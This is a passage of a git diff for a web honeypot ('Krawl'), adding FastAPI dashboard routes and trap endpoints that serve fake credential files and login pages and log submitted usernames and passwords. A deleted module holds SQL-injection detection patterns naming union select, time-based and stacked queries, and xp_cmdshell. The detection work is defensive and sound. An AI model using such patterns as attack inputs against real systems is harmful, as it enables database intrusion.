headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching top paths: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/top-user-agents") +async def top_user_agents( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_top_user_agents_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching top user agents: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/attack-types-stats") +async def attack_types_stats( + request: Request, + limit: int = Query(20), + ip_filter: str = Query(None), +): + db = get_db() + limit = min(max(1, limit), 100) + + try: + result = db.get_attack_types_stats(limit=limit, ip_filter=ip_filter) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching attack types stats: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/attack-types") +async def attack_types( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("timestamp"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_attack_types_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching attack types: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/raw-request/{log_id:int}") +async def raw_request(log_id: int, request: Request): + db = get_db() + try: + raw = db.get_raw_request_by_id(log_id) + if raw is None: + return JSONResponse( + content={"error": "Raw request not found"}, status_code=404 + ) + return JSONResponse(content={"raw_request": raw}, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching raw request: {e}") + return JSONResponse(content={"error": str(e)}, status_code=500) + + +@router.get("/api/get_banlist") +async def get_banlist(request: Request, fwtype: str = Query("iptables")): + config = request.app.state.config + + filename = f"{fwtype}_banlist.txt" + if fwtype == "raw": + filename = "malicious_ips.txt" + + file_path = os.path.join(config.exports_path, filename) + + try: + if os.path.exists(file_path): + with open(file_path, "rb") as f: + content = f.read() + return Response( + content=content, + status_code=200, + media_type="text/plain", + headers={ + "Content-Disposition": f'attachment; filename="{filename}"', + "Content-Length": str(len(content)), + }, + ) + else: + return PlainTextResponse("File not found", status_code=404) + except Exception as e: + get_app_logger().error(f"Error serving malicious IPs file: {e}") + return PlainTextResponse("Internal server error", status_code=500) + + +@router.get("/api/download/malicious_ips.txt") +async def download_malicious_ips(request: Request): + config = request.app.state.config + file_path = os.path.join(config.exports_path, "malicious_ips.txt") + + try: + if os.path.exists(file_path): + with open(file_path, "rb") as f: + content = f.read() + return Response( + content=content, + status_code=200, + media_type="text/plain", + headers={ + "Content-Disposition": 'attachment; filename="malicious_ips.txt"', + "Content-Length": str(len(content)), + }, + ) + else: + return PlainTextResponse("File not found", status_code=404) + except Exception as e: + get_app_logger().error(f"Error serving malicious IPs file: {e}") + return PlainTextResponse("Internal server error", status_code=500) diff --git a/src/routes/dashboard.py b/src/routes/dashboard.py new file mode 100644 index 0000000..081336c --- /dev/null +++ b/src/routes/dashboard.py @@ -0,0 +1,74 @@ +#!/usr/bin/env python3 + +""" +Dashboard page route. +Renders the main dashboard page with server-side data for initial load. +""" + +from fastapi import APIRouter, Request +from fastapi.responses import JSONResponse +from logger import get_app_logger + +from dependencies import get_db, get_templates + +router = APIRouter() + + +@router.get("") +@router.get("/") +async def dashboard_page(request: Request): + db = get_db() + config = request.app.state.config + dashboard_path = "/" + config.dashboard_secret_path.lstrip("/") + + # Get initial data for server-rendered sections + stats = db.get_dashboard_counts() + suspicious = db.get_recent_suspicious(limit=10) + + # Get credential count for the stats card + cred_result = db.get_credentials_paginated(page=1, page_size=1) + stats["credential_count"] = cred_result["pagination"]["total"] + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/index.html", + { + "request": request, + "dashboard_path": dashboard_path, + "stats": stats, + "suspicious_activities": suspicious, + }, + ) + + +@router.get("/ip/{ip_address:path}") +async def ip_page(ip_address: str, request: Request): + db = get_db() + try: + stats = db.get_ip_stats_by_ip(ip_address) + config = request.app.state.config + dashboard_path = "/" + config.dashboard_secret_path.lstrip("/") + + if stats: + # Transform fields for template compatibility + list_on = stats.get("list_on") or {} + stats["blocklist_memberships"] = list(list_on.keys()) if list_on else [] + stats["reverse_dns"] = stats.get("reverse") + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/ip.html", + { + "request": request, + "dashboard_path": dashboard_path, + "stats": stats, + "ip_address": ip_address, + }, + ) + else: + return JSONResponse( + content={"error": "IP not found"}, + ) + except Exception as e: + get_app_logger().error(f"Error fetching IP stats: {e}") + return JSONResponse(content={"error": str(e)}) diff --git a/src/routes/honeypot.py b/src/routes/honeypot.py new file mode 100644 index 0000000..e4b384c --- /dev/null +++ b/src/routes/honeypot.py @@ -0,0 +1,500 @@ +#!/usr/bin/env python3 + +""" +Honeypot trap routes for the Krawl deception server. +Migrated from handler.py serve_special_path(), do_POST(), and do_GET() catch-all. +""" + +import asyncio +import random +import time +from datetime import datetime +from urllib.parse import urlparse, parse_qs, unquote_plus + +from fastapi import APIRouter, Request, Response, Depends +from fastapi.responses import HTMLResponse, PlainTextResponse, JSONResponse + +from dependencies import ( + get_tracker, + get_app_config, + get_client_ip, + build_raw_request, +) +from config import Config +from tracker import AccessTracker +from templates import html_templates +from generators import ( + credentials_txt, + passwords_txt, + users_json, + api_keys_json, + api_response, + directory_listing, +) +from deception_responses import ( + generate_sql_error_response, + get_sql_response_with_data, + detect_xss_pattern, + generate_xss_response, + generate_server_error, +) +from wordlists import get_wordlists +from logger import get_app_logger, get_access_logger, get_credential_logger + +# --- Auto-tracking dependency --- +# Records requests that match attack patterns or honeypot trap paths. + + +async def _track_honeypot_request(request: Request): + """Record access for requests with attack patterns or honeypot path hits.""" + tracker = request.app.state.tracker + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + path = request.url.path + + body = "" + if request.method in ("POST", "PUT"): + body_bytes = await request.body() + body = body_bytes.decode("utf-8", errors="replace") + + # Check attack patterns in path and body + attack_findings = tracker.detect_attack_type(path) + + if body: + import urllib.parse + + decoded_body = urllib.parse.unquote(body) + attack_findings.extend(tracker.detect_attack_type(decoded_body)) + + # Record if attack pattern detected OR path is a honeypot trap + if attack_findings or tracker.is_honeypot_path(path): + tracker.record_access( + ip=client_ip, + path=path, + user_agent=user_agent, + body=body, + method=request.method, + raw_request=build_raw_request(request, body), + ) + + +router = APIRouter(dependencies=[Depends(_track_honeypot_request)]) + + +# --- Helper functions --- + + +def _should_return_error(config: Config) -> bool: + if config.probability_error_codes <= 0: + return False + return random.randint(1, 100) <= config.probability_error_codes + + +def _get_random_error_code() -> int: + wl = get_wordlists() + error_codes = wl.error_codes + if not error_codes: + error_codes = [400, 401, 403, 404, 500, 502, 503] + return random.choice(error_codes) + + +# --- HEAD --- + + +@router.head("/{path:path}") +async def handle_head(path: str): + return Response(status_code=200, headers={"Content-Type": "text/html"}) + + +# --- POST routes --- + + +@router.post("/api/search") +@router.post("/api/sql") +@router.post("/api/database") +async def sql_endpoint_post(request: Request): + client_ip = get_client_ip(request) + access_logger = get_access_logger() + + body_bytes = await request.body() + post_data = body_bytes.decode("utf-8", errors="replace") + + base_path = request.url.path + access_logger.info( + f"[SQL ENDPOINT POST] {client_ip} - {base_path} - Data: {post_data[:100] if post_data else 'empty'}" + ) + + error_msg, content_type, status_code = generate_sql_error_response(post_data) + + if error_msg: + access_logger.warning( + f"[SQL INJECTION DETECTED POST] {client_ip} - {base_path}" + ) + return Response( + content=error_msg, status_code=status_code, media_type=content_type + ) + else: + response_data = get_sql_response_with_data(base_path, post_data) + return Response( + content=response_data, status_code=200, media_type="application/json" + ) + + +@router.post("/api/contact") +async def contact_post(request: Request): + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + tracker = request.app.state.tracker + access_logger = get_access_logger() + app_logger = get_app_logger() + + body_bytes = await request.body() + post_data = body_bytes.decode("utf-8", errors="replace") + + parsed_data = {} + if post_data: + parsed_qs = parse_qs(post_data) + parsed_data = {k: v[0] if v else "" for k, v in parsed_qs.items()} + + xss_detected = any(detect_xss_pattern(str(v)) for v in parsed_data.values()) + + if xss_detected: + access_logger.warning( + f"[XSS ATTEMPT DETECTED] {client_ip} - {request.url.path} - Data: {post_data[:200]}" + ) + else: + access_logger.info(f"[XSS ENDPOINT POST] {client_ip} - {request.url.path}") + + response_html = generate_xss_response(parsed_data) + return HTMLResponse(content=response_html, status_code=200) + + +@router.post("/{path:path}") +async def credential_capture_post(request: Request, path: str): + """Catch-all POST handler for credential capture.""" + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + tracker = request.app.state.tracker + access_logger = get_access_logger() + credential_logger = get_credential_logger() + + body_bytes = await request.body() + post_data = body_bytes.decode("utf-8", errors="replace") + + full_path = f"/{path}" + + access_logger.warning( + f"[LOGIN ATTEMPT] {client_ip} - {full_path} - {user_agent[:50]}" + ) + + if post_data: + access_logger.warning(f"[POST DATA] {post_data[:200]}") + + username, password = tracker.parse_credentials(post_data) + if username or password: + timestamp = datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ") + credential_line = f"{timestamp}|{client_ip}|{username or 'N/A'}|{password or 'N/A'}|{full_path}" + credential_logger.info(credential_line) + + tracker.record_credential_attempt( + client_ip, full_path, username or "N/A", password or "N/A" + ) + + access_logger.warning( + f"[CREDENTIALS CAPTURED] {client_ip} - Username: {username or 'N/A'} - Path: {full_path}" + ) + + await asyncio.sleep(1) + return HTMLResponse(content=html_templates.login_error(), status_code=200) + + +# --- GET special paths --- + + +@router.get("/robots.txt") +async def robots_txt(): + return PlainTextResponse(html_templates.robots_txt()) + + +@router.get("/credentials.txt") +async def fake_credentials(): + return PlainTextResponse(credentials_txt()) + + +@router.get("/passwords.txt") +@router.get("/admin_notes.txt") +async def fake_passwords(): + return PlainTextResponse(passwords_txt()) + + +@router.get("/users.json") +async def fake_users_json(): + return JSONResponse(content=None, status_code=200, media_type="application/json") + + +@router.get("/api_keys.json") +async def fake_api_keys(): + return Response( + content=api_keys_json(), status_code=200, media_type="application/json" + ) + + +@router.get("/config.json") +async def fake_config_json(): + return Response( + content=api_response("/api/config"), + status_code=200, + media_type="application/json", + ) + + +# Override the generic /users.json to return actual content +@router.get("/users.json", include_in_schema=False) +async def fake_users_json_content(): + return Response( + content=users_json(), status_code=200, media_type="application/json" + ) + + +@router.get("/admin") +@router.get("/admin/") +@router.get("/admin/login") +@router.get("/login") +async def fake_login(): + return HTMLResponse(html_templates.login_form()) + + +@router.get("/users") +@router.get("/user") +@router.get("/database") +@router.get("/db") +@router.get("/search") +async def fake_product_search(): + return HTMLResponse(html_templates.product_search()) + + +@router.get("/info") +@router.get("/input") +@router.get("/contact") +@router.get("/feedback") +@router.get("/comment") +async def fake_input_form(): + return HTMLResponse(html_templates.input_form()) + + +@router.get("/server") +async def fake_server_error(): + error_html, content_type = generate_server_error() + return Response(content=error_html, status_code=500, media_type=content_type) + + +@router.get("/wp-login.php") +@router.get("/wp-login") +@router.get("/wp-admin") +@router.get("/wp-admin/") +async def fake_wp_login(): + return HTMLResponse(html_templates.wp_login()) + + +@router.get("/wp-content/{path:path}") +@router.get("/wp-includes/{path:path}") +async def fake_wordpress(path: str = ""): + return HTMLResponse(html_templates.wordpress()) + + +@router.get("/phpmyadmin") +@router.get("/phpmyadmin/{path:path}") +@router.get("/phpMyAdmin") +@router.get("/phpMyAdmin/{path:path}") +@router.get("/pma") +@router.get("/pma/") +async def fake_phpmyadmin(path: str = ""): + return HTMLResponse(html_templates.phpmyadmin()) + + +@router.get("/.env") +async def fake_env(): + return Response( + content=api_response("/.env"), status_code=200, media_type="application/json" + ) + + +@router.get("/backup/") +@router.get("/uploads/") +@router.get("/private/") +@router.get("/config/") +@router.get("/database/") +async def fake_directory_listing(request: Request): + return HTMLResponse(directory_listing(request.url.path)) + + +# --- SQL injection honeypot GET endpoints --- + + +@router.get("/api/search") +@router.get("/api/sql") +@router.get("/api/database") +async def sql_endpoint_get(request: Request): + client_ip = get_client_ip(request) + access_logger = get_access_logger() + app_logger = get_app_logger() + + base_path = request.url.path + request_query = request.url.query or "" + + error_msg, content_type, status_code = generate_sql_error_response(request_query) + + if error_msg: + access_logger.warning( + f"[SQL INJECTION DETECTED] {client_ip} - {base_path} - Query: {request_query[:100] if request_query else 'empty'}" + ) + return Response( + content=error_msg, status_code=status_code, media_type=content_type + ) + else: + access_logger.info( + f"[SQL ENDPOINT] {client_ip} - {base_path} - Query: {request_query[:100] if request_query else 'empty'}" + ) + response_data = get_sql_response_with_data(base_path, request_query) + return Response( + content=response_data, status_code=200, media_type="application/json" + ) + + +# --- Generic /api/* fake endpoints --- + + +@router.get("/api/{path:path}") +async def fake_api_catchall(request: Request, path: str): + full_path = f"/api/{path}" + return Response( + content=api_response(full_path), status_code=200, media_type="application/json" + ) + + +# --- Catch-all GET (trap pages with random links) --- +# This MUST be registered last in the router + + +@router.get("/{path:path}") +async def trap_page(request: Request, path: str): + """Generate trap page with random links. This is the catch-all route.""" + config = request.app.state.config + tracker = request.app.state.tracker + app_logger = get_app_logger() + access_logger = get_access_logger() + + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + full_path = f"/{path}" if path else "/" + + # Check wordpress-like paths + if "wordpress" in full_path.lower(): + return HTMLResponse(html_templates.wordpress()) + + is_suspicious = tracker.is_suspicious_user_agent(user_agent) + + if is_suspicious: + access_logger.warning( + f"[SUSPICIOUS] {client_ip} - {user_agent[:50]} - {full_path}" + ) + else: + access_logger.info(f"[REQUEST] {client_ip} - {full_path}") + + # Record access unless the router dependency already handled it + # (attack pattern or honeypot path → already recorded by _track_honeypot_request) + if not tracker.detect_attack_type(full_path) and not tracker.is_honeypot_path( + full_path + ): + tracker.record_access( + ip=client_ip, + path=full_path, + user_agent=user_agent, + method=request.method, + raw_request=build_raw_request(request) if is_suspicious else "", + ) + + # Random error response + if _should_return_error(config): + error_code = _get_random_error_code() + access_logger.info(f"Returning error {error_code} to {client_ip} - {full_path}") + return Response(status_code=error_code) + + # Response delay + await asyncio.sleep(config.delay / 1000.0) + + # Increment page visit counter + current_visit_count = tracker.increment_page_visit(client_ip) + + # Generate page + page_html = _generate_page( + config, tracker, client_ip, full_path, current_visit_count, request.app + ) + + # Decrement canary counter + request.app.state.counter -= 1 + if request.app.state.counter < 0: + request.app.state.counter = config.canary_token_tries + + return HTMLResponse(content=page_html, status_code=200) + + +def _generate_page(config, tracker, client_ip, seed, page_visit_count, app) -> str: + """Generate a webpage containing random links or canary token.""" + random.seed(seed) + + ip_category = tracker.get_category_by_ip(client_ip) + + should_apply_crawler_limit = False + if config.infinite_pages_for_malicious: + if ( + ip_category == "good_crawler" or ip_category == "regular_user" + ) and page_visit_count >= config.max_pages_limit: + should_apply_crawler_limit = True + else: + if ( + ip_category == "good_crawler" + or ip_category == "bad_crawler" + or ip_category == "attacker" + ) and page_visit_count >= config.max_pages_limit: + should_apply_crawler_limit = True + + if should_apply_crawler_limit: + return html_templates.main_page( + app.state.counter, "

Crawl limit reached.

" + ) + + num_pages = random.randint(*config.links_per_page_range) + content = "" + + if app.state.counter <= 0 and config.canary_token_url: + content += f""" + +""" + + webpages = app.state.webpages + if webpages is None: + for _ in range(num_pages): + address = "".join( + [ + random.choice(config.char_space) + for _ in range(random.randint(*config.links_length_range)) + ] + ) + content += f""" + +""" + else: + for _ in range(num_pages): + address = random.choice(webpages) + content += f""" + +""" + + return html_templates.main_page(app.state.counter, content) diff --git a/src/routes/htmx.py b/src/routes/htmx.py new file mode 100644 index 0000000..303bce5 --- /dev/null +++ b/src/routes/htmx.py @@ -0,0 +1,407 @@ +#!/usr/bin/env python3 + +""" +HTMX fragment endpoints. +Server-rendered HTML partials for table pagination, sorting, IP details, and search. +""" + +from fastapi import APIRouter, Request, Response, Query + +from dependencies import get_db, get_templates + +router = APIRouter() + + +def _dashboard_path(request: Request) -> str: + config = request.app.state.config + return "/" + config.dashboard_secret_path.lstrip("/") + + +# ── Honeypot Triggers ──────────────────────────────────────────────── + + +@router.get("/htmx/honeypot") +async def htmx_honeypot( + request: Request, + page: int = Query(1), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_honeypot_paginated( + page=max(1, page), page_size=5, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/honeypot_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["honeypots"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Top IPs ────────────────────────────────────────────────────────── + + +@router.get("/htmx/top-ips") +async def htmx_top_ips( + request: Request, + page: int = Query(1), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_top_ips_paginated( + page=max(1, page), page_size=8, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/top_ips_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["ips"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Top Paths ──────────────────────────────────────────────────────── + + +@router.get("/htmx/top-paths") +async def htmx_top_paths( + request: Request, + page: int = Query(1), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_top_paths_paginated( + page=max(1, page), page_size=5, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/top_paths_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["paths"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Top User-Agents ───────────────────────────────────────────────── + + +@router.get("/htmx/top-ua") +async def htmx_top_ua( + request: Request, + page: int = Query(1), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_top_user_agents_paginated( + page=max(1, page), page_size=5, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/top_ua_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["user_agents"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Attackers ──────────────────────────────────────────────────────── + + +@router.get("/htmx/attackers") +async def htmx_attackers( + request: Request, + page: int = Query(1), + sort_by: str = Query("total_requests"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_attackers_paginated( + page=max(1, page), page_size=25, sort_by=sort_by, sort_order=sort_order + ) + + # Normalize pagination key (DB returns total_attackers, template expects total) + pagination = result["pagination"] + if "total_attackers" in pagination and "total" not in pagination: + pagination["total"] = pagination["total_attackers"] + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/attackers_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["attackers"], + "pagination": pagination, + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Access logs by ip ──────────────────────────────────────────────────────── + + +@router.get("/htmx/access-logs") +async def htmx_access_logs_by_ip( + request: Request, + page: int = Query(1), + sort_by: str = Query("total_requests"), + sort_order: str = Query("desc"), + ip_filter: str = Query("ip_filter"), +): + db = get_db() + result = db.get_access_logs_paginated( + page=max(1, page), page_size=25, ip_filter=ip_filter + ) + + # Normalize pagination key (DB returns total_attackers, template expects total) + pagination = result["pagination"] + if "total_access_logs" in pagination and "total" not in pagination: + pagination["total"] = pagination["total_access_logs"] + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/access_by_ip_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["access_logs"], + "pagination": pagination, + "sort_by": sort_by, + "sort_order": sort_order, + "ip_filter": ip_filter, + }, + ) + + +# ── Credentials ────────────────────────────────────────────────────── + + +@router.get("/htmx/credentials") +async def htmx_credentials( + request: Request, + page: int = Query(1), + sort_by: str = Query("timestamp"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_credentials_paginated( + page=max(1, page), page_size=5, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/credentials_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["credentials"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Attack Types ───────────────────────────────────────────────────── + + +@router.get("/htmx/attacks") +async def htmx_attacks( + request: Request, + page: int = Query(1), + sort_by: str = Query("timestamp"), + sort_order: str = Query("desc"), + ip_filter: str = Query(None), +): + db = get_db() + result = db.get_attack_types_paginated( + page=max(1, page), + page_size=5, + sort_by=sort_by, + sort_order=sort_order, + ip_filter=ip_filter, + ) + + # Transform attack data for template (join attack_types list, map id to log_id) + items = [] + for attack in result["attacks"]: + items.append( + { + "ip": attack["ip"], + "path": attack["path"], + "attack_type": ", ".join(attack.get("attack_types", [])), + "user_agent": attack.get("user_agent", ""), + "timestamp": attack.get("timestamp"), + "log_id": attack.get("id"), + } + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/attack_types_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": items, + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + "ip_filter": ip_filter or "", + }, + ) + + +# ── Attack Patterns ────────────────────────────────────────────────── + + +@router.get("/htmx/patterns") +async def htmx_patterns( + request: Request, + page: int = Query(1), +): + db = get_db() + page = max(1, page) + page_size = 10 + + # Get all attack type stats and paginate manually + result = db.get_attack_types_stats(limit=100) + all_patterns = [ + {"pattern": item["type"], "count": item["count"]} + for item in result.get("attack_types", []) + ] + + total = len(all_patterns) + total_pages = max(1, (total + page_size - 1) // page_size) + offset = (page - 1) * page_size + items = all_patterns[offset : offset + page_size] + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/patterns_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": items, + "pagination": { + "page": page, + "page_size": page_size, + "total": total, + "total_pages": total_pages, + }, + }, + ) + + +# ── IP Insight (full IP page as partial) ───────────────────────────── + + +@router.get("/htmx/ip-insight/{ip_address:path}") +async def htmx_ip_insight(ip_address: str, request: Request): + db = get_db() + stats = db.get_ip_stats_by_ip(ip_address) + + if not stats: + stats = {"ip": ip_address, "total_requests": "N/A"} + + # Transform fields for template compatibility + list_on = stats.get("list_on") or {} + stats["blocklist_memberships"] = list(list_on.keys()) if list_on else [] + stats["reverse_dns"] = stats.get("reverse") + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/ip_insight.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "stats": stats, + "ip_address": ip_address, + }, + ) + + +# ── IP Detail ──────────────────────────────────────────────────────── + + +@router.get("/htmx/ip-detail/{ip_address:path}") +async def htmx_ip_detail(ip_address: str, request: Request): + db = get_db() + stats = db.get_ip_stats_by_ip(ip_address) + + if not stats: + stats = {"ip": ip_address, "total_requests": "N/A"} + + # Transform fields for template compatibility + list_on = stats.get("list_on") or {} + stats["blocklist_memberships"] = list(list_on.keys()) if list_on else [] + stats["reverse_dns"] = stats.get("reverse") + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/ip_detail.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "stats": stats, + }, + ) + + +# ── Search ─────────────────────────────────────────────────────────── + + +@router.get("/htmx/search") +async def htmx_search( + request: Request, + q: str = Query(""), + page: int = Query(1), +): + q = q.strip() + if not q: + return Response(content="", media_type="text/html") + + db = get_db() + result = db.search_attacks_and_ips(query=q, page=max(1, page), page_size=20) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/search_results.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "attacks": result["attacks"], + "ips": result["ips"], + "query": q, + "pagination": result["pagination"], + }, + ) diff --git a/src/server.py b/src/server.py deleted file mode 100644 index 94f1d1e..0000000 --- a/src/server.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/env python3 - -""" -Main server module for the deception honeypot. -Run this file to start the server. -""" - -import sys -from http.server import HTTPServer - -from config import get_config -from tracker import AccessTracker -from analyzer import Analyzer -from handler import Handler -from logger import ( - initialize_logging, - get_app_logger, - get_access_logger, - get_credential_logger, -) -from database import initialize_database -from tasks_master import get_tasksmaster - - -def print_usage(): - """Print usage information""" - print(f"Usage: {sys.argv[0]} [FILE]\n") - print("FILE is file containing a list of webpage names to serve, one per line.") - print("If no file is provided, random links will be generated.\n") - print("Configuration:") - print(" Configuration is loaded from a YAML file (default: config.yaml)") - print("Set CONFIG_LOCATION environment variable to use a different file.\n") - print("Example config.yaml structure:") - print("server:") - print("port: 5000") - print("delay: 100") - print("links:") - print("min_length: 5") - print("max_length: 15") - print("min_per_page: 10") - print("max_per_page: 15") - print("canary:") - print("token_url: null") - print("token_tries: 10") - print("dashboard:") - print("secret_path: null # auto-generated if not set") - print("database:") - print('path: "data/krawl.db"') - print("retention_days: 30") - print("behavior:") - print("probability_error_codes: 0") - - -def main(): - """Main entry point for the deception server""" - if "-h" in sys.argv or "--help" in sys.argv: - print_usage() - exit(0) - - config = get_config() - - # Initialize logging with timezone - initialize_logging() - app_logger = get_app_logger() - access_logger = get_access_logger() - credential_logger = get_credential_logger() - - # Initialize database for persistent storage - try: - initialize_database(config.database_path) - app_logger.info(f"Database initialized at: {config.database_path}") - except Exception as e: - app_logger.warning( - f"Database initialization failed: {e}. Continuing with in-memory only." - ) - - tracker = AccessTracker(config.max_pages_limit, config.ban_duration_seconds) - analyzer = Analyzer() - - Handler.config = config - Handler.tracker = tracker - Handler.analyzer = analyzer - Handler.counter = config.canary_token_tries - Handler.app_logger = app_logger - Handler.access_logger = access_logger - Handler.credential_logger = credential_logger - - if len(sys.argv) == 2: - try: - with open(sys.argv[1], "r") as f: - Handler.webpages = f.readlines() - - if not Handler.webpages: - app_logger.warning( - "The file provided was empty. Using randomly generated links." - ) - Handler.webpages = None - except IOError: - app_logger.warning("Can't read input file. Using randomly generated links.") - - # tasks master init - tasks_master = get_tasksmaster() - tasks_master.run_scheduled_tasks() - - try: - - banner = f""" - -============================================================ -DASHBOARD AVAILABLE AT -{config.dashboard_secret_path} -============================================================ - """ - app_logger.info(banner) - app_logger.info(f"Starting deception server on port {config.port}...") - if config.canary_token_url: - app_logger.info( - f"Canary token will appear after {config.canary_token_tries} tries" - ) - else: - app_logger.info( - "No canary token configured (set CANARY_TOKEN_URL to enable)" - ) - - server = HTTPServer(("0.0.0.0", config.port), Handler) - app_logger.info("Server started. Use to stop.") - server.serve_forever() - except KeyboardInterrupt: - app_logger.info("Stopping server...") - server.socket.close() - app_logger.info("Server stopped") - except Exception as e: - app_logger.error(f"Error starting HTTP server on port {config.port}: {e}") - app_logger.error( - f"Make sure you are root, if needed, and that port {config.port} is open." - ) - exit(1) - - -if __name__ == "__main__": - main() diff --git a/src/server_errors.py b/src/server_errors.py deleted file mode 100644 index 7b55654..0000000 --- a/src/server_errors.py +++ /dev/null @@ -1,65 +0,0 @@ -#!/usr/bin/env python3 - -import random -from wordlists import get_wordlists - - -def generate_server_error() -> tuple[str, str]: - wl = get_wordlists() - server_errors = wl.server_errors - - if not server_errors: - return ("500 Internal Server Error", "text/html") - - server_type = random.choice(list(server_errors.keys())) - server_config = server_errors[server_type] - - error_codes = { - 400: "Bad Request", - 401: "Unauthorized", - 403: "Forbidden", - 404: "Not Found", - 500: "Internal Server Error", - 502: "Bad Gateway", - 503: "Service Unavailable", - } - - code = random.choice(list(error_codes.keys())) - message = error_codes[code] - - template = server_config.get("template", "") - version = random.choice(server_config.get("versions", ["1.0"])) - - html = template.replace("{code}", str(code)) - html = html.replace("{message}", message) - html = html.replace("{version}", version) - - if server_type == "apache": - os = random.choice(server_config.get("os", ["Ubuntu"])) - html = html.replace("{os}", os) - html = html.replace("{host}", "localhost") - - return (html, "text/html") - - -def get_server_header(server_type: str = None) -> str: - wl = get_wordlists() - server_errors = wl.server_errors - - if not server_errors: - return "nginx/1.18.0" - - if not server_type: - server_type = random.choice(list(server_errors.keys())) - - server_config = server_errors.get(server_type, {}) - version = random.choice(server_config.get("versions", ["1.0"])) - - server_headers = { - "nginx": f"nginx/{version}", - "apache": f"Apache/{version}", - "iis": f"Microsoft-IIS/{version}", - "tomcat": f"Apache-Coyote/1.1", - } - - return server_headers.get(server_type, "nginx/1.18.0") diff --git a/src/sql_errors.py b/src/sql_errors.py deleted file mode 100644 index 583f7ed..0000000 --- a/src/sql_errors.py +++ /dev/null @@ -1,115 +0,0 @@ -#!/usr/bin/env python3 - -import random -import re -from typing import Optional, Tuple -from wordlists import get_wordlists - - -def detect_sql_injection_pattern(query_string: str) -> Optional[str]: - if not query_string: - return None - - query_lower = query_string.lower() - - patterns = { - "quote": [r"'", r'"', r"`"], - "comment": [r"--", r"#", r"/\*", r"\*/"], - "union": [r"\bunion\b", r"\bunion\s+select\b"], - "boolean": [r"\bor\b.*=.*", r"\band\b.*=.*", r"'.*or.*'.*=.*'"], - "time_based": [r"\bsleep\b", r"\bwaitfor\b", r"\bdelay\b", r"\bbenchmark\b"], - "stacked": [r";.*select", r";.*drop", r";.*insert", r";.*update", r";.*delete"], - "command": [r"\bexec\b", r"\bexecute\b", r"\bxp_cmdshell\b"], - "info_schema": [r"information_schema", 